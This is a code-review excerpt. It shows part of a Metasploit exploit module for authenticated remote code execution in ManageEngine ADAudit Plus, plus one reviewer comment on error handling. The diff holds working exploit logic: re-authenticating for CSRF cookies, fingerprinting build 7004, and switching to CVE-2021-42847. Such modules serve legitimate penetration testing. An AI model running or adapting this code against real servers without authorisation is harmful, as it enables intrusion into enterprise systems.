modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,564 @@
+      print_status('Attempting to authenticate again in order to retrieve the required cookies.')
+      # we have to authenticate again in order to get the required cookie
+      cookie_jar.clear
+      login_results = adaudit_plus_login(auth_domain, username, password, true)
+      login_msg = login_results['message']
+      case login_results['status']
+      when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+        fail_with(Failure::Unknown, login_msg)
+      when adaudit_plus_status::NO_ACCESS, adaudit_plus_status::NO_MATCH
+        fail_with(Failure::NoAccess, login_msg)
+      end
+
+      @adapcsrf_cookie = login_results['adapcsrf_cookie']
+    end
+
+    print_status('Attempting to create an alert profile')
+    # visit /api/json/jsMessage to see if we're dealing with 7003 or lower
+    res_check_7004 = send_request_cgi({
+      'uri' => adaudit_api_js_message_uri,
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' => { 'adapcsrf' => @adapcsrf_cookie }
+    })
+
+    unless res_check_7004
+      fail_with(Failure::Unknown, 'Connection failed when trying to get the required info via /api/json/jsMessage')
+    end
+
+    unless res_check_7004.code == 200 && res_check_7004.body.include?('adap_common_script_info')
+      fail_with(Failure::Unknown, 'Received unexpected response when trying to get the required info via /api/json/jsMessage')
+    end
+
+    alert_script_7004_msg = 'Your alert profile script path configuration is not compliant with the constraints listed below and needs to '\
+    'be changed. These constraints have been introduced in the latest build of ADAudit Plus 7004, to enhance security'
+
+    if res_check_7004.body.include?(alert_script_7004_msg)
+      # we are dealing with 7004 or higher. so exploitation can only succeed if the exploit method is cve_2021_42847
+      unless @exploit_method == 'cve_2021_42847'
+        # let's check for the CVE-2021-42847 endpoint in case the user has disabled autocheck
+        gpo_watcher_status = gpo_watcher_data_check
+        if gpo_watcher_status == adaudit_plus_status::SUCCESS
+          @exploit_method = 'cve_2021_42847'
+        else
+          fail_with(Failure::NotVulnerable, 'The target is build 7004 or up and not vulnerable to CVE-2021-42847. Exploitation is not possible.')
+        end
+
+        # here we have to authenticate again in order to get the required cookie
+        cookie_jar.clear
+        login_results = adaudit_plus_login(auth_domain, username, password, true)
+        login_msg = login_results['message']
+        case login_results['status']
+        when adaudit_plus_status::CONNECTION_FAILED
+          fail_with(Failure::Unknown, login_msg)
+        when adaudit_plus_status::UNEXPECTED_REPLY
+          fail_with(Failure::UnexpectedReply, login_msg)
+        when adaudit_plus_status::NO_ACCESS, adaudit_plus_status::NO_MATCH
+          fail_with(Failure::NoAccess, login_msg)
+        end
```

Comment:
See previous comment about using `NO_MATCH` with `Failure::NoAccess`. This also applies here.